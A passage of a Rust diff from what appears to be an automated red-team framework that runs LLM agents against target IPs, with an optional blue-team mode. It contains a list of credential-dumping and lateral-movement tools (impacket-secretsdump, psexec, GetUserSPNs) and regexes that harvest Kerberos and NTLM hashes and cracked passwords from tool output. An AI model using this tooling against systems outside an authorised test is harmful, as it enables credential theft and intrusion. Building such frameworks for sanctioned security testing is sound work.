orchestrator (optional — enabled when ARES_BLUE_ENABLED=1) --- + // Inject observability URLs from YAML config into env vars (blue tools read env vars). + #[cfg(feature = "blue")] + if let Some(ref cfg) = ares_config { + if let Some(ref obs) = cfg.observability { + if !obs.loki_url.is_empty() && std::env::var("LOKI_URL").is_err() { + std::env::set_var("LOKI_URL", &obs.loki_url); + } + if !obs.loki_auth_token.is_empty() && std::env::var("LOKI_AUTH_TOKEN").is_err() { + std::env::set_var("LOKI_AUTH_TOKEN", &obs.loki_auth_token); + } + if !obs.prometheus_url.is_empty() && std::env::var("PROMETHEUS_URL").is_err() { + std::env::set_var("PROMETHEUS_URL", &obs.prometheus_url); + } + } + } + #[cfg(feature = "blue")] + let blue_handle = if std::env::var("ARES_BLUE_ENABLED").as_deref() == Ok("1") { + // Create a separate LLM provider for the blue team + let blue_model_spec = std::env::var("ARES_BLUE_LLM_MODEL") + .ok() + .filter(|s| !s.is_empty()) + .unwrap_or_else(|| model_spec.clone()); + let (blue_provider, blue_model) = ares_llm::create_provider(&blue_model_spec) + .context("Failed to create blue team LLM provider")?; + + let blue_disp: Arc = + if std::env::var("ARES_TOOL_DISPATCH").as_deref() == Ok("local") { + Arc::new(tool_dispatcher::LocalToolDispatcher::new( + queue.clone(), + config.operation_id.clone(), + auth_throttle.clone(), + )) + } else { + Arc::new(tool_dispatcher::RedisToolDispatcher::new( + queue.clone(), + config.operation_id.clone(), + auth_throttle.clone(), + )) + }; + + info!(model = %blue_model, "Starting blue team orchestrator"); + Some(( + blue::spawn_blue_orchestrator( + blue_provider, + blue_model, + blue_disp, + config.redis_url.clone(), + shutdown_rx.clone(), + ), + blue::spawn_blue_auto_submit( + queue.clone(), + shared_state.clone(), + config.clone(), + blue_model_spec, + shutdown_rx.clone(), + ), + )) + } else { + None + }; + #[cfg(not(feature = "blue"))] + let blue_handle: Option<(tokio::task::JoinHandle<()>, tokio::task::JoinHandle<()>)> = None; + + // --- Recovery check --- + { + let recovery_mgr = recovery::OperationRecoveryManager::new(config.redis_url.clone()); + match recovery_mgr.recover(&config.operation_id).await { + Ok(recovered) => { + if !recovered.requeued_task_ids.is_empty() || !recovered.failed_task_ids.is_empty() + { + info!( + requeued = recovered.requeued_task_ids.len(), + failed = recovered.failed_task_ids.len(), + "Recovery: re-enqueued interrupted tasks" + ); + } + } + Err(e) => { + // Recovery failure is non-fatal — we already loaded state above + warn!(err = %e, "Recovery check failed (non-fatal, continuing)"); + } + } + } + + // --- Clear stale stop signal --- + // On restart (e.g. re-running with BLUE_ENABLED after a completed op), + // the previous run's stop signal may still be in Redis. Clear it so the + // main loop doesn't exit immediately. + { + let mut conn = queue.connection(); + let stop_key = ares_core::state::build_key(&config.operation_id, "stop_requested"); + let _: Result<(), _> = redis::AsyncCommands::del(&mut conn, &stop_key).await; + } + + // --- Completion monitor --- + let completion_disp = dispatcher.clone(); + let completion_state = shared_state.clone(); + let completion_shutdown = shutdown_rx.clone(); + let completion_handle = tokio::spawn(async move { + completion::wait_for_completion( + &completion_state, + &completion_disp, + completion_shutdown, + std::time::Duration::from_secs( + ares_config + .as_ref() + .map(|c| c.timeouts.operation_timeout) + .filter(|&t| t > 0) + .unwrap_or(7200), + ), + std::time::Duration::from_secs(10), + ) + .await; + info!("Completion monitor finished — operation complete"); + }); + + info!( + operation_id = %config.operation_id, + automation_tasks = auto_handles.len(), + "Orchestration loop started — all background tasks running" + ); + + // --- Pre-flight tool availability check --- + // Wait briefly for workers to start and publish their tool inventories, + // then warn loudly about any critical missing tools. + { + tokio::time::sleep(std::time::Duration::from_secs(5)).await; + let missing = monitoring::preflight_tool_check(&mut queue.connection()).await; + if !missing.is_empty() { + for (role, tools) in &missing { + warn!( + role = %role, + missing = ?tools, + "PREFLIGHT: worker is missing critical tools — operations will be degraded" + ); + } + } else { + info!("Preflight tool check passed — all critical tools available"); + } + } + + // --- Dispatch initial reconnaissance (seeds the reactive automation pipeline) --- + if !config.target_ips.is_empty() { + let recon_count = dispatch_initial_recon(&dispatcher, &config).await; + info!(tasks = recon_count, "Initial recon dispatched"); + } else { + warn!("No target IPs configured — skipping initial recon dispatch"); + } + + // --- Main loop --- + let mut stop_check = tokio::time::interval(std::time::Duration::from_secs(5)); + stop_check.set_missed_tick_behavior(tokio::time::MissedTickBehavior::Skip); + + loop { + tokio::select! { + // Process completed task results + result = result_rx.recv() => { + match result { + Some(completed) => { + result_processing::process_completed_task( + &completed, + &dispatcher, + &throttler, + ).await; + } + None => { + // Result consumer died — channel closed. + // Respawn it after a brief delay. + error!("Result consumer channel closed unexpectedly — restarting consumer"); + tokio::time::sleep(std::time::Duration::from_secs(2)).await; + let (_new_handle, new_rx) = spawn_result_consumer( + queue.clone(), + tracker.clone(), + config.clone(), + shutdown_rx.clone(), + ); + result_rx = new_rx; + } + } + } + + // Poll for remote stop signal from `ares-cli ops stop` + _ = stop_check.tick() => { + let mut conn = queue.connection(); + match ares_core::state::is_stop_requested(&mut conn, &config.operation_id).await { + Ok(true) => { + info!("Remote stop requested via Redis — shutting down"); + break; + } + Ok(false) => {} + Err(e) => { + warn!(err = %e, "Failed to check stop signal"); + } + } + } + + // Graceful shutdown on SIGTERM / SIGINT + _ = signal::ctrl_c() => { + info!("Shutdown signal received"); + break; + } + } + } + + // --- Graceful shutdown --- + info!("Shutting down background tasks..."); + let _ = shutdown_tx.send(true); + + // Blue investigations need time to finalize: score_against_ground_truth, + // set_status("completed"), release_lock, generate_report. 10s was too short. + let shutdown_timeout = std::time::Duration::from_secs(120); + tokio::select! { + _ = async { + let _ = tokio::join!( + lock_handle, + hb_handle, + deferred_handle, + cost_handle, + exploit_handle, + disc_handle, + refresh_handle, + completion_handle, + ); + for h in auto_handles { + let _ = h.await; + } + if let Some((h, auto)) = blue_handle { + let _ = h.await; + let _ = auto.await; + } + } => { + info!("All background tasks stopped"); + } + _ = tokio::time::sleep(shutdown_timeout) => { + warn!("Background task shutdown timed out"); + } + } + + // --- Finalize operation in Redis --- + // Write completion metadata, status key, clear lock and active pointer. + // Matches Python's operation completion sequence. + { + let mut conn = queue.connection(); + let has_da = shared_state.read().await.has_domain_admin; + let status = if has_da { "completed" } else { "stopped" }; + match ares_core::state::finalize_operation(&mut conn, &config.operation_id, status).await { + Ok(()) => info!( + operation_id = %config.operation_id, + status = status, + "Operation finalized in Redis" + ), + Err(e) => warn!( + operation_id = %config.operation_id, + err = %e, + "Failed to finalize operation in Redis" + ), + } + } + + info!("ares-orchestrator stopped"); + Ok(()) +} + +/// Run in blue-only mode: just the investigation poller, no red team. +/// +/// Requires only `ARES_REDIS_URL` and an LLM model. No operation ID needed. +#[cfg(feature = "blue")] +async fn run_blue_only() -> Result<()> { + info!("Running in BLUE-ONLY mode (no red team orchestrator)"); + + let redis_url = + std::env::var("ARES_REDIS_URL").unwrap_or_else(|_| "redis://127.0.0.1:6379/0".to_string()); + + // Load YAML config for observability URLs + if let Ok(cfg) = ares_core::config::AresConfig::from_env() { + if let Some(ref obs) = cfg.observability { + if !obs.loki_url.is_empty() && std::env::var("LOKI_URL").is_err() { + std::env::set_var("LOKI_URL", &obs.loki_url); + } + if !obs.loki_auth_token.is_empty() && std::env::var("LOKI_AUTH_TOKEN").is_err() { + std::env::set_var("LOKI_AUTH_TOKEN", &obs.loki_auth_token); + } + if !obs.prometheus_url.is_empty() && std::env::var("PROMETHEUS_URL").is_err() { + std::env::set_var("PROMETHEUS_URL", &obs.prometheus_url); + } + } + } + + let model_spec = std::env::var("ARES_LLM_MODEL") + .or_else(|_| std::env::var("ARES_BLUE_LLM_MODEL")) + .context("Set ARES_LLM_MODEL or ARES_BLUE_LLM_MODEL for blue-only mode")?; + + let (provider, model_name) = + ares_llm::create_provider(&model_spec).context("Failed to create LLM provider")?; + + // Blue uses a simple Redis-based tool dispatcher (no operation-scoped auth throttle) + let queue = self::task_queue::TaskQueue::connect(&redis_url) + .await + .context("Failed to connect to Redis")?; + let auth_throttle = tool_dispatcher::AuthThrottle::new(3, std::time::Duration::from_secs(30)); + let blue_disp: Arc = + Arc::new(tool_dispatcher::RedisToolDispatcher::new( + queue, + "blue-orchestrator".to_string(), + auth_throttle, + )); + + info!(model = %model_name, redis = %redis_url, "Blue-only orchestrator ready"); + + let (shutdown_tx, shutdown_rx) = watch::channel(false); + + let blue_handle = + blue::spawn_blue_orchestrator(provider, model_name, blue_disp, redis_url, shutdown_rx); + + // Wait for shutdown signal + signal::ctrl_c().await?; + info!("Shutdown signal received"); + let _ = shutdown_tx.send(true); + + let shutdown_timeout = std::time::Duration::from_secs(120); + tokio::select! { + _ = blue_handle => { + info!("Blue orchestrator stopped"); + } + _ = tokio::time::sleep(shutdown_timeout) => { + warn!("Blue orchestrator shutdown timed out"); + } + } + + info!("ares-orchestrator (blue-only) stopped"); + Ok(()) +} diff --git a/ares-cli/src/orchestrator/monitoring.rs b/ares-cli/src/orchestrator/monitoring.rs new file mode 100644 index 00000000..bfad6e18 --- /dev/null +++ b/ares-cli/src/orchestrator/monitoring.rs @@ -0,0 +1,471 @@ +//! Heartbeat monitoring and stale-task cleanup. +//! +//! Mirrors the Python `ares.core.dispatcher.monitoring.MonitoringMixin`: +//! - Periodic heartbeat sweep to detect dead agents +//! - Stale task cleanup to prevent throttle deadlock +//! - Operation lock TTL refresh + +use anyhow::Result; +use chrono::{DateTime, Utc}; +use std::collections::HashMap; +use std::sync::Arc; +use tokio::sync::watch; +use tracing::{debug, info, warn}; + +use crate::orchestrator::config::OrchestratorConfig; +use crate::orchestrator::routing::ActiveTaskTracker; +use crate::orchestrator::task_queue::TaskQueue; + +// --------------------------------------------------------------------------- +// Agent registry +// --------------------------------------------------------------------------- + +/// Live state for a registered agent. +#[derive(Debug, Clone)] +#[allow(dead_code)] +pub struct AgentState { + pub name: String, + pub role: String, + pub status: String, + pub last_heartbeat: DateTime, + pub current_task: Option, +} + +/// Registry of known agents with their health state. +#[derive(Debug, Clone)] +pub struct AgentRegistry { + agents: Arc>>, +} + +impl AgentRegistry { + pub fn new() -> Self { + Self { + agents: Arc::new(tokio::sync::Mutex::new(HashMap::new())), + } + } + + /// Register an agent (or update it if already known). + #[allow(dead_code)] + pub async fn register(&self, name: &str, role: &str) { + let mut agents = self.agents.lock().await; + agents + .entry(name.to_string()) + .and_modify(|a| { + a.role = role.to_string(); + }) + .or_insert_with(|| AgentState { + name: name.to_string(), + role: role.to_string(), + status: "idle".to_string(), + last_heartbeat: Utc::now(), + current_task: None, + }); + } + + /// Update heartbeat data from Redis. + pub async fn update_heartbeat( + &self, + name: &str, + status: &str, + current_task: Option<&str>, + timestamp: DateTime, + ) { + let mut agents = self.agents.lock().await; + if let Some(agent) = agents.get_mut(name) { + agent.status = status.to_string(); + agent.current_task = current_task.map(|s| s.to_string()); + agent.last_heartbeat = timestamp; + } + } + + /// Return agents whose heartbeat is older than `timeout`. + pub async fn stale_agents(&self, timeout: std::time::Duration) -> Vec { + let agents = self.agents.lock().await; + let cutoff = Utc::now() - chrono::Duration::from_std(timeout).unwrap_or_default(); + agents + .values() + .filter(|a| a.last_heartbeat < cutoff && a.status != "offline") + .cloned() + .collect() + } + + /// Mark an agent offline. + pub async fn mark_offline(&self, name: &str) { + let mut agents = self.agents.lock().await; + if let Some(agent) = agents.get_mut(name) { + agent.status = "offline".to_string(); + } + } + + /// List all registered agent names (for heartbeat sweep). + pub async fn agent_names(&self) -> Vec { + let agents = self.agents.lock().await; + agents.keys().cloned().collect() + } +} + +// --------------------------------------------------------------------------- +// Lock keeper — independent task that only refreshes the operation lock +// --------------------------------------------------------------------------- + +/// Spawn a dedicated task that extends the operation lock TTL every +/// `heartbeat_interval`. This is intentionally decoupled from the heartbeat +/// sweep so that a slow/hanging Redis call in the sweep cannot block lock +/// refresh and cause the lock to expire. +/// +/// Creates its own Redis connection to avoid contention with the main +/// connection pool used for tool dispatch and result polling. +pub fn spawn_lock_keeper( + queue: TaskQueue, + config: Arc, + mut shutdown: watch::Receiver, +) -> tokio::task::JoinHandle<()> { + tokio::spawn(async move { + // Create a dedicated Redis connection for the lock keeper so that + // EXPIRE commands are not queued behind heavy BRPOP/LPUSH traffic + // on the shared connection manager. + let dedicated_queue = match TaskQueue::connect(&config.redis_url).await { + Ok(q) => { + info!("Lock keeper using dedicated Redis connection"); + q + } + Err(e) => { + warn!(err = %e, "Lock keeper failed to create dedicated connection, falling back to shared"); + queue.clone() + } + }; + + let mut interval = tokio::time::interval(config.heartbeat_interval); + + loop { + tokio::select! { + _ = interval.tick() => {}, + _ = shutdown.changed() => { + debug!("Lock keeper shutting down"); + break; + } + } + + // Wrap in a timeout so a hung Redis connection can't block us + // for longer than the lock TTL. + let extend_timeout = std::time::Duration::from_secs(10); + let result = tokio::time::timeout( + extend_timeout, + dedicated_queue.extend_lock(&config.operation_id, config.lock_ttl), + ) + .await; + + match result { + Ok(Ok(true)) => {} // Lock TTL refreshed + Ok(Ok(false)) => { + // Lock key disappeared — re-acquire it + warn!( + operation_id = %config.operation_id, + "Lock key missing, attempting re-acquisition" + ); + match dedicated_queue + .try_acquire_lock(&config.operation_id, config.lock_ttl) + .await + { + Ok(true) => info!( + operation_id = %config.operation_id, + "Operation lock re-acquired" + ), + Ok(false) => warn!( + operation_id = %config.operation_id, + "Lock re-acquisition failed — another holder exists" + ), + Err(e) => warn!(err = %e, "Lock re-acquisition error"), + } + } + Ok(Err(e)) => { + warn!(err = %e, "Failed to extend operation lock"); + } + Err(_) => { + warn!("Lock extend timed out (Redis unresponsive?)"); + } + } + } + }) +} + +// --------------------------------------------------------------------------- +// Heartbeat monitor task +// --------------------------------------------------------------------------- + +/// Spawn a background task that periodically: +/// 1. Reads heartbeat keys from Redis for all known agents +/// 2. Marks stale agents as offline +/// 3. Cleans up stale tasks +/// +/// Lock refresh is handled by the separate `spawn_lock_keeper` task. +/// +/// Runs until `shutdown` is signalled. +pub fn spawn_heartbeat_monitor( + queue: TaskQueue, + registry: AgentRegistry, + tracker: ActiveTaskTracker, + config: Arc, + mut shutdown: watch::Receiver, +) -> tokio::task::JoinHandle<()> { + tokio::spawn(async move { + let mut interval = tokio::time::interval(config.heartbeat_interval); + let mut consecutive_failures: u32 = 0; + + loop { + tokio::select! { + _ = interval.tick() => {}, + _ = shutdown.changed() => { + info!("Heartbeat monitor shutting down"); + break; + } + } + + if let Err(e) = run_heartbeat_sweep(&queue, ®istry, &config).await { + consecutive_failures += 1; + warn!( + attempt = consecutive_failures, + err = %e, + "Heartbeat sweep failed" + ); + // Exponential backoff on repeated failures + let delay = std::time::Duration::from_secs(std::cmp::min( + 15, + (consecutive_failures as u64) * 5, + )); + tokio::time::sleep(delay).await; + continue; + } + consecutive_failures = 0; + + // Clean up stale tasks (salvage any pending results first) + if let Err(e) = cleanup_stale_tasks(&tracker, &queue, &config).await { + warn!(err = %e, "Stale task cleanup failed"); + } + } + }) +} + +/// Read heartbeats from Redis and update the registry. +async fn run_heartbeat_sweep( + queue: &TaskQueue, + registry: &AgentRegistry, + config: &OrchestratorConfig, +) -> Result<()> { + let names = registry.agent_names().await; + for name in &names { + match queue.get_heartbeat(name).await { + Ok(Some(hb)) => { + let ts = DateTime::parse_from_rfc3339(&hb.timestamp) + .map(|dt| dt.with_timezone(&Utc)) + .unwrap_or_else(|_| Utc::now()); + registry + .update_heartbeat(name, &hb.status, hb.current_task.as_deref(), ts) + .await; + } + Ok(None) => { + debug!(agent = %name, "No heartbeat key in Redis"); + } + Err(e) => { + warn!(agent = %name, err = %e, "Failed to read heartbeat"); + } + } + } + + // Mark stale agents offline + let stale = registry.stale_agents(config.heartbeat_timeout).await; + for agent in &stale { + warn!( + agent = %agent.name, + last_hb = %agent.last_heartbeat, + "Agent heartbeat stale — marking offline" + ); + registry.mark_offline(&agent.name).await; + } + + Ok(()) +} + +/// Remove tasks that have been active longer than the configured stale timeout. +/// +/// Before removing, checks Redis for unclaimed results and logs a warning so +/// we know the result consumer missed them. (The real-time discovery push in +/// `RedisToolDispatcher` ensures discoveries still reach state.) +async fn cleanup_stale_tasks( + tracker: &ActiveTaskTracker, + queue: &TaskQueue, + config: &OrchestratorConfig, +) -> Result<()> { + let llm_count = tracker.llm_task_count().await; + let hard_cap = config.hard_cap(); + + // Use shorter timeout when at hard cap to break deadlock faster + let effective_timeout = if llm_count >= hard_cap { + config.stale_task_timeout / 2 + } else { + config.stale_task_timeout + }; + + let stale = tracker.stale_tasks(effective_timeout).await; + for task in &stale { + // Check if there's an unclaimed result sitting in Redis + let has_unclaimed = queue + .has_pending_result(&task.task_id) + .await + .unwrap_or(false); + + if has_unclaimed { + warn!( + task_id = %task.task_id, + role = %task.role, + age_secs = task.submitted_at.elapsed().as_secs(), + "Removing stale task with UNCLAIMED result in Redis (result consumer missed it)" + ); + } else { + warn!( + task_id = %task.task_id, + role = %task.role, + age_secs = task.submitted_at.elapsed().as_secs(), + "Removing stale task" + ); + } + tracker.remove(&task.task_id).await; + } + + if !stale.is_empty() { + info!( + removed = stale.len(), + llm_count, hard_cap, "Stale task cleanup complete" + ); + } + + Ok(()) +} + +// --------------------------------------------------------------------------- +// Pre-flight tool check +// --------------------------------------------------------------------------- + +/// Critical tools per worker role. If any of these are missing, operations +/// will be severely degraded. +pub(crate) const CRITICAL_TOOLS: &[(&str, &[&str])] = &[ + ("recon", &["nmap", "netexec"]), + ( + "credential_access", + &[ + "impacket-GetUserSPNs", + "impacket-GetNPUsers", + "impacket-secretsdump", + ], + ), + ("privesc", &["impacket-findDelegation", "impacket-getST"]), + ( + "lateral", + &[ + "impacket-psexec", + "impacket-smbexec", + "impacket-secretsdump", + ], + ), +]; + +/// Query Redis for each worker's tool inventory and report any missing +/// critical tools. Returns a list of (role, missing_tools) pairs. +pub(crate) async fn preflight_tool_check( + conn: &mut redis::aio::ConnectionManager, +) -> Vec<(String, Vec)> { + use redis::AsyncCommands; + + let mut problems = Vec::new(); + + for &(role, critical) in CRITICAL_TOOLS { + let agent_key = format!("ares:tools:ares-{role}-agent"); + let available: Vec = match conn.get::<_, Option>(&agent_key).await { + Ok(Some(json)) => serde_json::from_str(&json).unwrap_or_default(), + _ => { + // No inventory published yet — worker may not have started + warn!( + role = role, + "No tool inventory found — worker may not be running" + ); + problems.push(( + role.to_string(), + critical.iter().map(|s| s.to_string()).collect(), + )); + continue; + } + }; + + let missing: Vec = critical + .iter() + .filter(|&&tool| !available.iter().any(|a| a == tool)) + .map(|s| s.to_string()) + .collect(); + + if !missing.is_empty() { + problems.push((role.to_string(), missing)); + } + } + + problems +} + +#[cfg(test)] +mod tests { + use super::*; + + #[tokio::test] + async fn register_and_list() { + let r = AgentRegistry::new(); + r.register("ares-recon-0", "recon").await; + r.register("ares-lateral-0", "lateral").await; + let mut names = r.agent_names().await; + names.sort(); + assert_eq!(names, vec!["ares-lateral-0", "ares-recon-0"]); + } + + #[tokio::test] + async fn heartbeat_update_prevents_staleness() { + let r = AgentRegistry::new(); + r.register("a1", "recon").await; + r.update_heartbeat("a1", "busy", Some("task-42"), Utc::now()) + .await; + assert!(r + .stale_agents(std::time::Duration::from_secs(60)) + .await + .is_empty()); + } + + #[tokio::test] + async fn stale_agent_detected() { + let r = AgentRegistry::new(); + r.register("old", "recon").await; + let old_ts = Utc::now() - chrono::Duration::seconds(120); + r.update_heartbeat("old", "idle", None, old_ts).await; + let stale = r.stale_agents(std::time::Duration::from_secs(60)).await; + assert_eq!(stale.len(), 1); + assert_eq!(stale[0].name, "old"); + } + + #[tokio::test] + async fn mark_offline_excludes_from_stale() { + let r = AgentRegistry::new(); + r.register("dead", "recon").await; + let old_ts = Utc::now() - chrono::Duration::seconds(300); + r.update_heartbeat("dead", "idle", None, old_ts).await; + r.mark_offline("dead").await; + assert!(r + .stale_agents(std::time::Duration::from_secs(60)) + .await + .is_empty()); + } + + #[tokio::test] + async fn re_register_updates_role() { + let r = AgentRegistry::new(); + r.register("a1", "recon").await; + r.register("a1", "lateral").await; + let agents = r.agents.lock().await; + assert_eq!(agents.get("a1").unwrap().role, "lateral"); + } +} diff --git a/ares-cli/src/orchestrator/output_extraction/hashes.rs b/ares-cli/src/orchestrator/output_extraction/hashes.rs new file mode 100644 index 00000000..11ac84ea --- /dev/null +++ b/ares-cli/src/orchestrator/output_extraction/hashes.rs @@ -0,0 +1,308 @@ +use regex::Regex; +use std::sync::LazyLock; + +use ares_core::models::{Credential, Hash}; + +use super::{is_valid_credential, make_credential}; + +static RE_TGS_HASH: LazyLock = LazyLock::new(|| { + Regex::new(r"(\$krb5tgs\$\d+\$\*([^$*]+)\$([^$*]+)\$[^$]+\$[a-fA-F0-9$]+)").unwrap() +}); + +static RE_ASREP_HASH: LazyLock = + LazyLock::new(|| Regex::new(r"(\$krb5asrep\$\d+\$([^@:]+)@([^:]+):[a-fA-F0-9$]+)").unwrap()); + +// domain\user:rid:lmhash:nthash::: +static RE_NTLM_DOMAIN: LazyLock = LazyLock::new(|| { + Regex::new(r"([^\\:\s]+)\\([^:\\]+):\d+:([a-fA-F0-9]{32}):([a-fA-F0-9]{32}):::").unwrap() +}); + +// user:rid:lmhash:nthash::: +static RE_NTLM_PLAIN: LazyLock = LazyLock::new(|| { + Regex::new(r"^([^:\\$\s]+):(\d+):([a-fA-F0-9]{32}):([a-fA-F0-9]{32}):::").unwrap() +}); + +// Partial NTLM line (line-wrapped secretsdump) +static RE_NTLM_PARTIAL: LazyLock = + LazyLock::new(|| Regex::new(r"^[^:\s]+:\d+:[a-fA-F0-9]{32}:[a-fA-F0-9]+$").unwrap()); + +static RE_NTLM_CONTINUATION: LazyLock = + LazyLock::new(|| Regex::new(r"^[a-fA-F0-9]+:::$").unwrap()); + +pub fn extract_hashes(output: &str, default_domain: &str) -> Vec { + let mut hashes = Vec::new(); + let mut seen = std::collections::HashSet::new(); + + // First pass: unwrap line-wrapped NTLM hashes + let lines: Vec<&str> = output.lines().collect(); + let mut unwrapped: Vec = Vec::new(); + let mut i = 0; + while i < lines.len() { + let line = lines[i].trim(); + if RE_NTLM_PARTIAL.is_match(line) && i + 1 < lines.len() { + let next = lines[i + 1].trim(); + if RE_NTLM_CONTINUATION.is_match(next) { + unwrapped.push(format!("{}{}", line, next)); + i += 2; + continue; + } + } + unwrapped.push(line.to_string()); + i += 1; + } + + for line in &unwrapped { + // Priority: TGS → AS-REP → NTLM (first match wins) + + // TGS (Kerberoast) + if let Some(caps) = RE_TGS_HASH.captures(line) { + let hash_value = caps.get(1).unwrap().as_str(); + let username = caps.get(2).unwrap().as_str(); + let domain = caps.get(3).unwrap().as_str(); + let key = format!("tgs:{}@{}", username.to_lowercase(), domain.to_lowercase()); + if seen.insert(key) { + hashes.push(Hash { + id: uuid::Uuid::new_v4().to_string(), + username: username.to_string(), + hash_value: hash_value.to_string(), + hash_type: "kerberoast".to_string(), + domain: domain.to_string(), + cracked_password: None, + source: "output_extraction".to_string(), + discovered_at: Some(chrono::Utc::now()), + parent_id: None, + attack_step: 0, + aes_key: None, + }); + } + continue; + } + + // AS-REP + if let Some(caps) = RE_ASREP_HASH.captures(line) { + let hash_value = caps.get(1).unwrap().as_str(); + let username = caps.get(2).unwrap().as_str(); + let domain = caps.get(3).unwrap().as_str(); + let key = format!( + "asrep:{}@{}", + username.to_lowercase(), + domain.to_lowercase() + ); + if seen.insert(key) { + hashes.push(Hash { + id: uuid::Uuid::new_v4().to_string(), + username: username.to_string(), + hash_value: hash_value.to_string(), + hash_type: "asrep".to_string(), + domain: domain.to_string(), + cracked_password: None, + source: "output_extraction".to_string(), + discovered_at: Some(chrono::Utc::now()), + parent_id: None, + attack_step: 0, + aes_key: None, + }); + } + continue; + } + + // NTLM with domain prefix + if let Some(caps) = RE_NTLM_DOMAIN.captures(line) { + let domain = caps.get(1).unwrap().as_str(); + let username = caps.get(2).unwrap().as_str(); + let lm = caps.get(3).unwrap().as_str(); + let nt = caps.get(4).unwrap().as_str(); + let hash_value = format!("{lm}:{nt}"); + let key = format!("ntlm:{}@{}", username.to_lowercase(), domain.to_lowercase()); + if seen.insert(key) { + hashes.push(Hash { + id: uuid::Uuid::new_v4().to_string(), + username: username.to_string(), + hash_value, + hash_type: "ntlm".to_string(), + domain: domain.to_string(), + cracked_password: None, + source: "output_extraction".to_string(), + discovered_at: Some(chrono::Utc::now()), + parent_id: None, + attack_step: 0, + aes_key: None, + }); + } + continue; + } + + // NTLM without domain prefix + if let Some(caps) = RE_NTLM_PLAIN.captures(line) { + let username = caps.get(1).unwrap().as_str(); + let lm = caps.get(3).unwrap().as_str(); + let nt = caps.get(4).unwrap().as_str(); + let hash_value = format!("{lm}:{nt}"); + let key = format!( + "ntlm:{}@{}", + username.to_lowercase(), + default_domain.to_lowercase() + ); + if seen.insert(key) { + hashes.push(Hash { + id: uuid::Uuid::new_v4().to_string(), + username: username.to_string(), + hash_value, + hash_type: "ntlm".to_string(), + domain: default_domain.to_string(), + cracked_password: None, + source: "output_extraction".to_string(), + discovered_at: Some(chrono::Utc::now()), + parent_id: None, + attack_step: 0, + aes_key: None, + }); + } + } + } + + hashes +} + +/// Hashcat cracked TGS: $krb5tgs$23$*user$DOMAIN$spn*$hash:plaintext +static RE_CRACKED_TGS: LazyLock = LazyLock::new(|| { + Regex::new(r"\$krb5tgs\$\d+\$\*([^$*]+)\$([^$*]+)\$[^*]+\*\$[a-fA-F0-9$]+:(.+)$").unwrap() +}); + +/// Cracked AS-REP: $krb5asrep$23$user@DOMAIN:hash:plaintext (hashcat) +/// or $krb5asrep$23$user@DOMAIN:plaintext (john --show, no hex section) +static RE_CRACKED_ASREP: LazyLock = LazyLock::new(|| { + Regex::new(r"\$krb5asrep\$\d+\$([^@:]+)@([^:]+):(?:[a-fA-F0-9$]+:)?(.+)$").unwrap() +}); + +/// John --show output: user:plaintext (with optional trailing :::... fields) +/// Only matches lines that look like john --show format — username followed by +/// password, then optional RID and empty LM/NT fields. +static RE_JOHN_SHOW: LazyLock = LazyLock::new(|| { + Regex::new(r"^([^:\s$][^:]*):([^:]+):\d*:(?:[a-fA-F0-9]*:){0,3}:*\s*$").unwrap() +}); + +/// John --show unknown user: ?:plaintext (john can't determine username from TGS hashes) +static RE_JOHN_UNKNOWN_USER: LazyLock = LazyLock::new(|| Regex::new(r"^\?:(.+)$").unwrap()); + +/// Extract username/domain from a TGS hash in the output text. +static RE_TGS_HASH_USER: LazyLock = + LazyLock::new(|| Regex::new(r"\$krb5tgs\$\d+\$\*([^$*]+)\$([^$*]+)").unwrap()); + +pub fn extract_cracked_passwords(output: &str, default_domain: &str) -> Vec { + let mut credentials = Vec::new(); + let mut seen = std::collections::HashSet::new(); + + // Detect john --show context (john outputs "N password hash cracked") + let is_john_output = + output.contains("password hash cracked") || output.contains("password hashes cracked"); + + for line in output.lines() { + let stripped = line.trim(); + if stripped.is_empty() { + continue; + } + + // Hashcat cracked TGS (Kerberoast) + if let Some(caps) = RE_CRACKED_TGS.captures(stripped) { + let username = caps.get(1).unwrap().as_str(); + let domain = caps.get(2).unwrap().as_str(); + let password = caps.get(3).unwrap().as_str(); + if is_valid_credential(username, password) { + let key = format!( + "cracked:{}@{}", + username.to_lowercase(), + domain.to_lowercase() + ); + if seen.insert(key) { + credentials.push(make_credential( + username, + password, + domain, + "cracked:hashcat", + )); + } + } + continue; + } + + // Hashcat cracked AS-REP + if let Some(caps) = RE_CRACKED_ASREP.captures(stripped) { + let username = caps.get(1).unwrap().as_str(); + let domain = caps.get(2).unwrap().as_str(); + let password = caps.get(3).unwrap().as_str(); + if is_valid_credential(username, password) { + let key = format!( + "cracked:{}@{}", + username.to_lowercase(), + domain.to_lowercase() + ); + if seen.insert(key) { + credentials.push(make_credential( + username, + password, + domain, + "cracked:hashcat", + )); + } + } + continue; + } + + // John --show output (only if we detected john context) + if is_john_output { + // John --show unknown user: ?:password (TGS hashes) + // Try to extract username from a $krb5tgs$ line in the same output. + if let Some(caps) = RE_JOHN_UNKNOWN_USER.captures(stripped) { + let password = caps.get(1).unwrap().as_str().trim(); + if is_valid_credential("?", password) { + // Scan output for a TGS hash line to get username/domain + if let Some(tgs_caps) = RE_TGS_HASH_USER.captures(output) { + let username = tgs_caps.get(1).unwrap().as_str(); + let domain = tgs_caps.get(2).unwrap().as_str(); + let key = format!( + "cracked:{}@{}", + username.to_lowercase(), + domain.to_lowercase() + ); + if seen.insert(key) { + credentials.push(make_credential( + username, + password, + domain, + "cracked:john", + )); + } + } + } + continue; + } + + if let Some(caps) = RE_JOHN_SHOW.captures(stripped) { + let username = caps.get(1).unwrap().as_str(); + let password = caps.get(2).unwrap().as_str(); + // Skip john summary lines + if username.chars().all(|c| c.is_ascii_digit()) { + continue; + } + if is_valid_credential(username, password) { + let key = format!( + "cracked:{}@{}", + username.to_lowercase(), + default_domain.to_lowercase() + ); + if seen.insert(key) { + credentials.push(make_credential( + username, + password, + default_domain, + "cracked:john", + )); + } + } + } + } + } + + credentials +} diff --git a/ares-cli/src/orchestrator/output_extraction/hosts.rs b/ares-cli/src/orchestrator/output_extraction/hosts.rs new file mode 100644 index 00000000..b8cb463d --- /dev/null +++ b/ares-cli/src/orchestrator/output_extraction/hosts.rs @@ -0,0 +1,108 @@ +use regex::Regex; +use std::sync::LazyLock; + +use ares_core::models::Host; + +static RE_SMB_BANNER: LazyLock = LazyLock::new(|| { + Regex::new(r"SMB\s+(\d{1,3}(?:\.\d{1,3}){3})\s+\d+\s+([A-Za-z0-9_.\-]+)\s+\[\*\]\s+(.+)") + .unwrap() +}); + +static RE_SMB_BANNER_NAME: LazyLock = + LazyLock::new(|| Regex::new(r"\(name:([^)]+)\)").unwrap()); + +static RE_SMB_BANNER_DOMAIN: LazyLock = + LazyLock::new(|| Regex::new(r"\(domain:([^)]+)\)").unwrap()); + +static 